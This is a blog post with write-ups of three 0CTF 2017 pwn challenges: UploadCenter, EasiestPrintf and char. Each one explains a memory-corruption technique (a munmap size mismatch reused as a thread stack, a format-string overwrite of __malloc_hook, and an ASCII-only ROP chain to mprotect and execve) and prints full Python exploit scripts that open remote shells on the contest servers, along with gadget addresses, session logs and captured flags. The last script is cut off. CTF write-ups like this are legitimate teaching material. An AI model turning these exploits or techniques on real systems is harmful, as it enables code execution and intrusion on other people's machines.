Monday, March 20, 2017

0CTF 2017 - UploadCenter (PWN 523)

Welcome to another Menu Chall right~
Here you can use any function as you wish
No more words , Let't begin
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File

UploadCenter was a small service (x86-64, Linux) that allowed you to upload PNG files and do nothing with them. Well, that's not entirely true - you could list them (it would show you their width/height and depth), remove them and spawn two kinds of threads (one would inform you about any new uploads - i.e. when you would upload a file it would tell you that you've uploaded a file; and the second one would just list all the files in a different thread).

The PNGs themselves were kept on a linked list, where each node would contain (in short) some basic information about the PNG, a pointer to mmap'ed memory where the PNG was placed, and the size of said mmap'ed memory area.

The critical parts of the task were related to three menu options: 2 (upload), 4 (delete) and 6 (monitor), so I'll focus on them.

Starting with the most boring one, 4 :) Delete File function removed the specified PNG from the linked list, unmapped the memory chunk and freed all the structures (PNG descriptor, list node). As far as I'm concerned it was correctly implemented and for the sake of this write up the most interesting part was the munmap call:

        munmap(i->mmap_addr, i->mmap_size);

Going to the next function, 6 :) Monitor File spawned a new thread, which (in an infinite loop) waited for a condition to be met (new file uploaded) and displayed a message. It basically boiled down to the following code:

  while ( !pthread_mutex_lock(&mutex) )
  {
    while ( !ev_file_added )
      pthread_cond_wait(&cond, &mutex);
    ...
    puts("New file uploaded, Please check");
    ...
  }

And the last, and most important part, was the 2 :) Upload and parse File function, which worked in the following way:

  1. It asked the user for a 32-bit word containing data size (limited at 1 MB).
  2. And then received that many bytes from the user.
  3. Then inflated (i.e. zlib decompressed) the data (limited at 32 MB).
  4. And did some simplistic PNG format parsing (which, apart from the width and height, could basically be ignored).
  5. After that it mmap'ed an area of size width * height (important!) and copied that amount of decompressed data there.
  6. And then it set entry->mmap_size to the size of decompressed data (so there was a mismatch between what was mapped,and what would be unmapped when deleting).

So actually what you could do (using functions 2 and 4) is unmap an adjacent area of memory to one of the PNG areas. But how to get code execution from that?

At this moment I would like to recommend this awesome blogpost (kudos to mak for handing me a link during the CTF): http://tukan.farm/2016/07/27/munmap-madness/

The method I used is exactly what is described there, i.e.:

  1. I've allocated two 8 MB areas (i.e. uploaded two PNGs), where one area was described correctly as 8 MB and the other incorrectly as 16 MB block, 
  2. I've freed the correctly allocated one (i.e. deleted it from the list).
  3. And then I used option 6 to launch a new thread. The stack of the new thread was placed exactly in the place of the PNG I just unmapped.
  4. And then I've unmapped the second PNG, which actually unmapped the stack of the new thread as well (these areas were next to each over). Since the thread was waiting for a mutex it didn't crash.
  5. At that moment it was enough to upload a new 8 MB PNG that contained the "new stack" (with ROP chain + some minor additions) for the new thread (upload itself would wake the thread) and the woken thread would eventually grab a return address from the now-controlled-by-us stack leading to code execution.
At that point my stage 1 ROP leaked libc address (using puts to leak its address from .got table) and fetched stage 2 of ROP, which run execve with /bin/sh. This was actually a little more tricky since the new thread and the main thread were racing to read data from stdin, which made part of my exploit always end up in the wrong place (and this misaligned the stack_) - but its nothing that cannot be fixed with running the exploit a couple of times.

And that's it. Full exploit code is available at the end of the post (I kept the nasty bits - i.e. debugging code, etc - in there for educational reasons... I guess).


 +--^----------,--------,-----,--------^-,
 | |||||||||   `--------'     |          O
 `+---------------------------^----------|
   `_,---------,---------,--------------'
     / XXXXXX /'|       /'
    / XXXXXX /  `    /'
   / XXXXXX /`-------'
  / XXXXXX /
 / XXXXXX /
(________(        007 James Bond
`------'
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
ls -la
total 84
drwxr-xr-x  22 root root  4096 Mar  9 11:42 .
drwxr-xr-x  22 root root  4096 Mar  9 11:42 ..
drwxr-xr-x   2 root root  4096 Mar  9 11:45 bin
drwxr-xr-x   3 root root  4096 Mar  9 11:48 boot
drwxr-xr-x  17 root root  2980 Mar  9 13:10 dev
drwxr-xr-x  85 root root  4096 Mar 19 14:12 etc
drwxr-xr-x   3 root root  4096 Mar 18 17:49 home
lrwxrwxrwx   1 root root    31 Mar  9 11:42 initrd.img -> /boot/initrd.img-3.16.0-4-amd64
drwxr-xr-x  14 root root  4096 Mar  9 11:43 lib
drwxr-xr-x   2 root root  4096 Mar  9 11:41 lib64
drwx------   2 root root 16384 Mar  9 11:40 lost+found
drwxr-xr-x   3 root root  4096 Mar  9 11:40 media
drwxr-xr-x   2 root root  4096 Mar  9 11:41 mnt
drwxr-xr-x   2 root root  4096 Mar  9 11:41 opt
dr-xr-xr-x 112 root root     0 Mar  9 13:10 proc
drwx------   4 root root  4096 Mar 19 14:12 root
drwxr-xr-x  17 root root   680 Mar 19 14:07 run
drwxr-xr-x   2 root root  4096 Mar  9 11:49 sbin
drwxr-xr-x   2 root root  4096 Mar  9 11:41 srv
dr-xr-xr-x  13 root root     0 Mar 17 21:12 sys
drwx-wx-wt   7 root root  4096 Mar 20 05:17 tmp
drwxr-xr-x  10 root root  4096 Mar  9 11:41 usr
drwxr-xr-x  11 root root  4096 Mar  9 11:41 var
lrwxrwxrwx   1 root root    27 Mar  9 11:42 vmlinuz -> boot/vmlinuz-3.16.0-4-amd64
cat /home/*/flag
flag{M3ybe_Th1s_1s_d1ffer3nt_UAF_Y0U_F1rst_S33n}

The exploit (you'll probably have to run it a couple of times):

#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def upload_file(s, fname):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d)

def png_header(magic, data):
  return ''.join([
    pack(">I", len(data)),
    magic,
    data,
    pack(">I", 0x41414141),  # CRC    
  ])

  
def make_png(w, h):
  return ''.join([
    "89504E470D0A1A0A".decode("hex"),  # Magic
    png_header("IHDR",
      pack(">IIBBBBB",
        w, h, 8, 2, 0, 0, 0  # 24-bit RGB
    )),
    png_header("IDAT", ""),
    png_header("IEND", ""),
  ])   


def upload_png(s, w, h, final_sz, padding="", pbyte="A"):
  png = make_png(w, h)
  while len(png) % 8 != 0:
    png += "\0"
  png += padding
  print len(png), final_sz
  png = png.ljust(final_sz, pbyte)
  png = png.encode("zlib")

  if len(png) > 1048576:
    print "!!!!!!! ZLIB: %i vs %i" % (len(png), 1048576)

  s.sendall("2\n")
  s.sendall(dd(len(png)))
  s.sendall(png)
  print s.recvuntil(MENU_LAST_LINE)

def upload_string(s, d):
  z = d.encode("zlib")
  s.sendall(dd(len(z)))
  s.sendall(z)

def upload_file_padded(s, fname, padding):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d + padding)

MENU_LAST_LINE = "6 :) Monitor File\n"
READ_INFO_LAST_LINE = "enjoy your tour\n"

def del_entry(s, n):
  s.sendall("4\n")
  s.sendall(str(n) + "\n")
  print s.recvuntil(MENU_LAST_LINE)

def spawn_monitor(s):
  s.sendall("6\n")
  print s.recvuntil(MENU_LAST_LINE)


def set_rdi(v):
  # 0x4038b1    pop rdi
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038b1),
    dq(v)
  ])

def set_rsi_r15(rsi=0, r15=0):
  # 0x4038af    pop rsi
  # 0x4038b0    pop r15
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038af),
    dq(rsi),
    dq(r15),    
  ])

def call_puts(addr):
  # 0400AF0
  return ''.join([
    set_rdi(addr),
    dq(0x0400AF0),
  ])

def call_read_bytes(addr, sz):
  # 400F14
  return ''.join([
    set_rdi(addr),
    set_rsi_r15(rsi=sz),
    dq(0x400F14),
  ])

def stack_pivot(addr):
  # 0x402ede    pop rsp
  # 0x402edf    pop r13
  # 0x402ee1    ret
  return ''.join([
    dq(0x402ede),
    dq(addr - 8)
  ])

def call_sleep(tm):
  return ''.join([
    set_rdi(tm),
    dq(0x400C30),
  ])


def go():  
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!

  
  print s.recvuntil(MENU_LAST_LINE)

  #s.sendall("1\n")
  #s.sendall("A" * 20)
  #s.sendall("1\n")
  #print s.recvuntil(READ_INFO_LAST_LINE)

  #s.sendall("0000000000000001A")
  #s.sendall("B" * 1)  # 2, 8
  #time.sleep(0.5)
  #s.sendall("1\n")
  #d = s.recvuntil(READ_INFO_LAST_LINE)
  #print d
  #sth = d.split(" , enjoy your tour")[0].split("Welcome Team ")[1]
  #print sth.encode("hex")


  upload_png(s, 10, 10, 0x1000)

  upload_png(s, 1, 8392704, 8392704) # 1
  upload_png(s, 1, 8392704, 8392704 + 8392704)
  del_entry(s, 1)

  spawn_monitor(s)

  del_entry(s, 1)
  
  # Now we hope that not all threads run.

  padding = []
  for i in range((8392704 - 128) / 8):  # ~1mln
    if i < 900000:
      padding.append(dq(0))
    else:
      padding.append(dq(0x4141414100000000 | i))

  padding[0xfffd9] = dq(0x0060E400)
  padding[0xfffda] = dq(0x0060E400)

  del padding[0xfffdd:]

  VER = 0x4098DC
  VER_STR = "1.2.8\n"

  CMD = "/bin/sh\0"
  #CMD = CMD.ljust(64, "\0")

  rop = ''.join([
    call_sleep(1),
    call_puts(VER),
    call_puts(0x060E028),
    call_puts(0x060E029),
    call_puts(0x060E02A),
    call_puts(0x060E02B),
    call_puts(0x060E02C),
    call_puts(0x060E02D),
    call_puts(0x060E02E),
    call_puts(0x060E02F),
    call_puts(VER),
    call_read_bytes(0x0060E400, 512 + len(CMD)),
    stack_pivot(0x0060E410)
  ])

  padding.append(rop)
  padding = ''.join(padding)

  #print "press enter to trigger"
  #raw_input()
  print "\x1b[1;33mTriggering!\x1b[m"
  upload_png(s, 1, 8392704, 8392704, padding)

  s.recvuntil(VER_STR)
  puts_libc = ''
  for x in s.recvuntil(VER_STR).splitlines():
    if len(x) == 0:
      puts_libc += "\0"
    else:
      puts_libc += x[0]
    if len(puts_libc) == 8:
      break

  puts_libc = rq(puts_libc)
  LIBC = puts_libc - 0x06B990
  print "LIBC: %x" % LIBC

  rop2 = ''.join([
    #dq(0x402ee1) * 16,  # nopsled
    dq(0x401363) * 16,
    set_rsi_r15(0x0060EF00, 0),
    set_rdi(0x0060E400 + 512),
    dq(LIBC+0xBA310), # execve
  ])

  rop2 = rop2.ljust(512, "\0")
  rop2 += CMD * 16

  s.sendall("PPPPPPPP" + rop2 + (" " * 16))
    

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = '202.120.7.216'
PORT = 12345
#HOST = '127.0.0.1'
#HOST = '192.168.2.218'
#PORT = 1234
go()



0CTF 2017 - EasiestPrintf (PWN 150)

The task, as the name implies, was a rather basic (at first glance - there was a plot twist) format string bug in a short 32-bit Debian application. The initial description of the task was:

---
Warm UP! A traditional Format String Attack.
202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
---

And it later was upgraded (without me noticing 😭; though in all fairness it didn't change much) to:

---
Warm UP! A traditional Format String Attack.
It's running on Debian 8.
nc 202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
http://dl.0ops.net/libc.so.6_0ed9bad239c74870ed2db31c735132ce
---

The code itself was rather simple and boiled down to the following steps:

  1. Turn off buffering for stdin/stdout/stderr and setup alarm for one minute (a rather usual thing in CTF tasks).
  2. Manually randomize the stack address by doing a 16-byte aligned alloca().
  3. Get one decimal number (address) from the user and print in hexadecimal a 32-bit word from that address (an explicit leak).
  4. Read up to 159 bytes into a buffer on the stack (or up until \n was encountered, whichever came first) and do a printf(buffer) on it.
  5. Call exit(0) immediately after printf.

The manual ASLR from the second point could actually be ignored (at least I didn't find it annoying in any way) and the explicit leak from third point had to be used to leak the address of libc (or, to be more accurate, leak one of the addresses of resolved functions from .got and calculate the address of libc based on that).

While a link to libc was added later to the task description, I didn't notice until after I already solved the challenge, so I had to use the usual method of leaking 2-3 addresses from .got (in my case these were read, close and alarm) and look up the libc in our database of libcs (a good thing toi have). This resulted in finding exactly one library that matched all three addresses (or rather all three 12-bit lowest parts of the addresses) and giving me exactly one libc. And exactly zero ld-linux.so.2, which meant I couldn't debug the application locally, but I didn't care that much either (if possible I prefer to solve the tasks straight on the challenge server - way less problems with differences in the environment).

After having the libc the rest I had to do was create a format string which would overwrite .got exit entry with the address of a ROP gadget that would pivot the stack to my buffer and thus launch a ROP chain that runs system("/bin/sh"). Done, right?

Wrong.

It turned out that .got was read-only.

This started a 3 hour long journey to find a way to overwrite something that will give me control over EIP. The fact that immediately after printf() returned exit() was called didn't make things easier. The things I tried on the way:

  • Destructor tables in main binary and libc - nope, read only.
  • The atexit list - nope, pointer encrypted, don't know the secret value.
  • stdout's function vector table - nope, read only (one thing I didn't try was to change the address of the vector table itself).
  • A few function pointers that might be called on exit in libc - nope, read only.
  • The return address of printf itself - nope, no idea where the stack is.

Finally I recalled that libc has memory allocation hooks (__malloc_hook, __free_hook, etc) which are pointers to functions that are called when malloc or free are invoked. Luckily these pointers were not encrypted (i.e. due to the nature of how these are used/set up by the programmer - global function pointers that are to be overwritten - they cannot be encrypted).

However, does printf really use malloc?

At first I though about the $ positional markers - when the glibc's printf implementation encounters them, it create a copy of the argument from the stack (it needs a lookup table, and the usual vararg accessing methods don't provide such option). But it turned out it uses alloca() (i.e. on stack allocation) to do it (snippet from glibc-2.19/stdio-common/vfprintf.c):


  /* Here starts the more complex loop to handle positional parameters.  */
do_positional: 
...
    /* Array with information about the needed arguments.  This has to
       be dynamically extensible.  */
    size_t nspecs = 0;
    /* A more or less arbitrary start value.  */
    size_t nspecs_size = 32 * sizeof (struct printf_spec);
    struct printf_spec *specs = alloca (nspecs_size);


But since I was already looking at printf's internals, I just grepped for "malloc" and "free" finding a couple of places where they are indeed called. The most promising one was related to the width specifier (you know, e.g. "%1234x" - 1234 is the width of the field) of any format field:


if (width >= sizeof (work_buffer) / sizeof (work_buffer[0]) - 32)
 {
   /* We have to use a special buffer.  The "32" is just a safe
      bet for all the output which is not counted in the width.  */
   size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
   if (__libc_use_alloca (needed))
     workend = (CHAR_T *) alloca (needed) + width + 32;
   else
     {
         workstart = (CHAR_T *) malloc (needed);


After both doing some experiments (looking when malloc is called and when it's not) and looking up this code within the libc binary, I found out that any width above 65535 - 32 actually causes a malloc (and then eventually a free) to be called. And that both the __malloc_hook and __free_hook are really called giving me EIP control.

Initially I wanted to overwrite the __free_hook with a gadget that would pivot the stack to my buffer to launch a ROP chain, but it turned out it's rather hard to do that (or at least my experiments failed; might be that it was 4am though). 

So in the end I resorted to using a method abusing the fact that __malloc_hook was actually called with the width (+32) as an argument, so I ended up doing the following:
  1. I've put "sh\0\0" in main binary's .data section.
  2. Then overwritten __malloc_hook with the address of system.
  3. And triggered the whole thing by using a "%WIDTHs" tag, where WIDTH was the address of said "sh\0\0" minus 32.
A small problem was that the address of the third byte of __malloc_hook contained the \n character, which broke my write-byte-by-byte method (i.e. "%hhn"), but it was enough to switch to a write-a-word method for that specific place (so the upper byte of the word overwrites the problematic byte).

And to my surprise, it worked with the first try (full exploit is at the end of the post):


gynvael:haven-windows> pwnbase.py
libc @  0xf75de000L
224 196 0xe0L
195 24803 0x61c3L
247 52 0x61f7L
224 124 0x6273
195 245 0x6368
97 152 0x6400
247 256 0x6500
120
Shell opened!
cat /home/EasiestPrintf/flag
flag{Dr4m471c_pr1N7f_45_y0u_Kn0w}


And that's it! I really liked this task especially due to the plot twist with r-x .got - it forced me to dig a little deeper then usually in the printf internals, which was pretty fun in the end.


P.S. Exploit (Python 2.7):


#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def go():
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!
  M1 = "Which address you wanna read:\n"
  s.recvuntil(M1)
  addr = 0x08049FD4  # alarm in .got
  s.sendall("%u\n" % addr)
  LIBC = int(s.recvuntil("\n").strip(), 16)
  LIBC -= 0xB6C70

  print "libc @ ", hex(LIBC)

  SYSTEM = LIBC + 0x3E3E0
  EBFE = LIBC + 0x24119  # Good for debugging.
  PUTS = 0x80485C0

  WHAT = SYSTEM
  WHERE = LIBC + 0x1A9408

  WHERE2 = 0x804A04C  # A writable address in .data.
  WHAT2 = rd("sh\0\0")

  fmt = ""
  fmt += dd(WHERE) + dd(WHERE+1) + dd(WHERE+3)
  fmt += dd(WHERE2) + dd(WHERE2+1) + dd(WHERE2+2) + dd(WHERE2+3)

  cnt = len(fmt)

  def getoffset(b, c):
    while c >= b:
      b += 256

    return b - c, b

  # First write (__malloc_hook with system).
  diff, cnt = getoffset(WHAT & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%7$hhn"

  diff, cnt = getoffset((WHAT >> 8) & 0xffff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%8$hn"

  diff, cnt = getoffset((WHAT >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%9$hhn"

  # Second write (.data address with "sh\0\0".
  diff, cnt = getoffset(WHAT2 & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%10$hhn"

  diff, cnt = getoffset((WHAT2 >> 8) & 0xff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%11$hhn"

  diff, cnt = getoffset((WHAT2 >> 16) & 0xff, cnt)
  print (WHAT >> 16) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%12$hhn"

  diff, cnt = getoffset((WHAT2 >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%13$hhn"  

  # Trigger the malloc, use addr of "sh\0\0" as width.
  fmt += "%" + str(WHERE2 - 32) + "s"

  # Padding to 4. Probably not needed.
  while (len(fmt) % 4) != 0:
    fmt += "|"

  print len(fmt)
  if '\n' in fmt:
    print "OOOOOOOOOPSSSSSS \\n in payload lol"
  s.sendall(fmt + "\n")
  s.sendall("echo -- it worked --\n")
  s.recvuntil("-- it worked --\n")
  print "Shell opened!"

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  s.close()

HOST = '202.120.7.210'
PORT = 12321
go()




0CTF 2017 - char (shellcoding 132)

The code in the "char" task was rather simple - you get to send in 2400 bytes of input (using scanf's "%2400s", so no whitechars allowed), then the input gets checked whether there are any non-ASCII characters (also excluding all control characters like newlines or tabs) and if that condition was met it would be copied using strcpy to a waaay-to-small stack-based buffer to trigger a standard stack-based buffer overflow. Since the application was compiled with NX, ROP was the go to solution.

One important detail is that the authors made it easier to solve by mapping a certain (provided) libc file directly into R-X memory starting at an ASCII-friendly address of 0x5555E000 - this was to be the main and only source of gadgets for this task.

So all that was left was to create an ASCII-friendly (w/o whitechars) ROP chain that gets either a shell or the flag directly. And it took me about an hour per controlled register (so ~5 hours total) to do it.

The exploit with quoted gadgets is provided at the end of this post, but before I'll get there here are some notes on my approach:

  • For gadget gathering I used a custom distorm3-based script that outputted only gadgets on ASCII-friendly addresses (it's at the end of the post).
  • Initial idea was to use mmap syscall to allocate a new RWX memory area, but that plan backfired since 32-bit mmap requires a defined structure in memory and I didn't really have an easy way to access writable memory (non-ASCII-friendly addresses).
  • Eventually I went after mprotect syscall to change 0x5555E000 area's permissions to RWX; mprotect required me to control 3 registers for parameters (EBX, ECX and EDX) and EAX for syscall number (and, as it turned out, ESI for the syscall invocation).
  • I started by doing a simple experiment to check how flexible mprotect's parameters really are (I've done it in a separate simple test program); thanks to this I found out that:
    - The address parameter MUST be page aligned (well, I actually already knew that).
    - The size parameter can be anything large; if it's too large mprotect returns an error, but still successfully remaps the existing pages to desired access rights (this I didn't know).
    - The protection flags (permissions) parameter isn't too flexible; value 0xF (instead of 7) still worked, but that's about it (any other bytes set made mprotect fail).
  • The first gadget I found was EB FE (jmp $ - i.e. infinite loop) which is super useful for debugging purposes (i.e. checking until what moment the ROP chain works correctly).
  • The rest of the way I went register-by-register, focusing on a single one until I was able to assign it the desired value.
  • For EDX (see setup_edx_flags) register I used three ASCII-friendly subtractions to get value 7 (representing RWX) into the register. The values themselves (0x6b5e7b63 - 0x3b363f38 - 0x30283c24 → 7) were generated using a simple helper z3 script (attached after the exploit near the end of this post). A lot of registers were corrupted due to the low quality of gadgets I had, so it was first on the execution list.
  • For EBX (see setup_ebx_addr) register I used three ASCII-friendly xor's to get address 0x55562000. Note that this isn't the beginning of the memory area, since you cannot get bytes with most significant bits set using ASCII-friendly xor's (i.e. you couldn't get the 0xE0 byte from 0x5555E000; but that's OK). Again, the values I've used were z3 generated (0x28243062 ^ 0x24222c22 ^ 0x59503c40 → 0x55562000).
  • For EAX (see setup_eax_mprotect) I've initially set the register to 0x4141417d and then used a movzx eax, al gadget the clear top 24-bits leaving only 0x7d (i.e. mprotect syscall number).
  • For ECX I didn't have to do anything, as it already had a sufficiently large value when the syscall was to be executed. Lucky me :)
  • Invoking the syscall (or actually a int 0x80 gadget) turned out to be tricky, as none of the gadgets were on ASCII-friendly addresses. I've ended up calculating the gadget address into ESI register (again, courtesy of z3: 0x69787631 + 0x7c74247b + 0x6f783045 → 0x5564caf1) and then using a fun little push esi; ret gadget which jumped to the int 0x80.
  • The above chain piece gave ma a writable and executable memory area. I initially thought of putting a shellcode there, but in the end it was sufficient to put (see poke) "/bin//sh" string on an address that had a null-byte naturally occurring at the end of said string, and then use that for execve function call (not to be confused with the execve syscall).
  • I've jumped to the execve function using exactly the same method I used to jump to the int 0x80 gadget. The parameters (on the stack, as, again, it was a function call and not a syscall invocation) included the address of the aforementioned "/bin//sh\0" string, followed by two addresses of a NULL ptr in memory (these would be treated as "empty argv" and "empty envp" tables).
And that was it.

gynvael:haven> python pwnbase.py 
Final ROP length: 312
You maybe feel some familiar with this challenge ? 
Yes, I made a little change 
GO : ) 

cat /home/char/flag
flag{Asc11_ea3y_d0_1t???}

A pretty fun task :)

The full exploit follows (and the z3 script is at the bottom).

#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def set1(ebx=0x41414141, esi=0x41414141, edi=0x41414141, ebp=0x41414141):
  """
  0x5557506c    pop ebx
  0x5557506d    pop esi
  0x5557506e    pop edi
  0x5557506f    pop ebp
  0x55575070    ret
  """
  return ''.join([
    dd(0x5557506c),
    dd(ebx),
    dd(esi),
    dd(edi),
    dd(ebp)
  ])

def set_ebx(ebx):
  """
  0x556a7742    pop ebx
  0x556a7743    ret
  """
  return ''.join([
    dd(0x556a7742),
    dd(ebx)
  ])

def set_eax(eax):  # Destroys ECX.
  return ''.join([
    set_ecx(eax),
    mov_eax_ecx()
  ])

def set_esi(esi):
  """
  0x55686c72    pop esi
  0x55686c73    ret
  """
  return ''.join([
    dd(0x55686c72),
    dd(esi)
  ])

def set_ecx(ecx):  # AL+0xA
  """
  0x556d2a51    pop ecx
  0x556d2a52    add al, 0xa
  0x556d2a54    ret
  """
  return ''.join([
    dd(0x556d2a51),
    dd(ecx)
  ])

def mov_eax_ecx():
  """
  0x556a6253    mov eax, ecx
  0x556a6255    ret
  """
  return dd(0x556a6253)
  

def set_edx_edi(edx=0x41414141, edi=0x41414141): # Zeroes EAX
  # 0x555f3555    pop edx
  # 0x555f3556    xor eax, eax
  # 0x555f3558    pop edi
  # 0x555f3559    ret
  return ''.join([
    dd(0x555f3555),
    dd(edx),
    dd(edi),
  ])  

def set_ebp(ebp):
  """
  0x5557506f    pop ebp
  0x55575070    ret
  """
  return ''.join([
    dd(0x5557506f),
    dd(ebp)
  ])

def add_esi_ebx():
  """
  0x555c612c    add esi, ebx
  0x555c612e    ret
  """
  return dd(0x555c612c)

def ret_to_esi():
  """
  0x556d262a    push esi
  0x556d262b    ret
  """
  return dd(0x556d262a)

def mov_ptr_edx_edi():
  """
  0x55687b3c    mov [edx], edi
  0x55687b3e    pop esi
  0x55687b3f    pop edi
  0x55687b40    ret
  """
  return ''.join([
    dd(0x55687b3c),
    dd(0x41414141),
    dd(0x41414141),    
  ])

def poke(addr, v):
  return ''.join([
    set_edx_edi(addr, v),
    mov_ptr_edx_edi(),
  ])

def setup_esi_syscall():
  # desired = 0x000EEAF1 + 0x5555E000
  # Constants generated by z3 helper script.
  a2 = 0x69787631
  a1 = 0x7c74247b
  a3 = 0x6f783045
  # Test:  0x5564caf1L (True)

  return ''.join([
    set_esi(a1),
    set_ebx(a2),
    add_esi_ebx(),
    set_ebx(a3),
    add_esi_ebx()    
  ])

def setup_esi_execve():
  # desired = 0xB85E0 + 0x5555E000
  # Constants generated by z3 helper script.
  # sat
  a2 = 0x69747441
  a1 = 0x7378747e
  a3 = 0x78747d21
  # Test:  0x556165e0L (True)

  return ''.join([
    set_esi(a1),
    set_ebx(a2),
    add_esi_ebx(),
    set_ebx(a3),
    add_esi_ebx()    
  ])

def sub_edx_eax():  # Destroys: EAX, ESI, EDI, EBP
  """
  0x5560365c    sub edx, eax
  0x5560365e    pop esi
  0x5560365f    mov eax, edx
  0x55603661    pop edi
  0x55603662    pop ebp
  0x55603663    ret
  """
  return ''.join([
    dd(0x5560365c),
    dd(0x41414141),
    dd(0x41414141),
    dd(0x41414141)    
  ])

def setup_ebx_addr():
  # Constants generated by z3 helper script.
  a2 = 0x28243062
  a1 = 0x24222c22
